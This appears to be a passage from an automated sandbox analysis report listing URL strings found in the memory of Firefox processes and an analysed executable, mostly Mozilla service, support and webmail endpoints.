Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001E.00000002.3115240088.000039E679900000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comZ
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.comresource://gre/modules/reader/ReaderWorker.sys.mjs
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com.downloadAlwaysOpenSimilarFilesMenuItemresource://gre/modules/Async
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043317383.00000270D7D21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6CBA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%sFailed
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%schrome://extensions/content/schemas/manifest.json
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://mail.inbox.lv/compose?to=%sCan
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9BD7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggesthttps://www.msn.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6CB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7C73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.alwaysAskBeforeHandling
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comprofilerRecordingButtonCreatedMOZ_BROWSER_TOOLBOX_BINARYisPopupFeatureFl
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3035541532.00000270D6CB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/setBlockedSponsorsMetrics
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/setBlockedSponsorsMetricsFORCE_PRIVATE_BROWSING_WINDOW
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.js
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/adsafeprotected-ima.jsWeb
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001E.00000002.3108461657.00000270E4380000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_ke
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001E.00000003.3007114305.00000270E5CCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4092000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC74B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user_downloadDocument/
Source: firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001E.00000002.3060815323.00000270DADB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001E.00000003.3016349963.00000270DCBE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2994507601.00000270DCBE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2173000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpInternalTestingProfi
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3089496928.00000270DDC8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesPanelUI._onNotificationButt
Source: file.exe, 00000000.00000003.2147229613.000000002EF31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 0000001E.00000003.2985790168.00000270E441E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3008157636.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E219F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2998160641.00000270E41DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2993891650.00000270E219F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001E.00000002.3078302717.00000270DC7A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E40A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
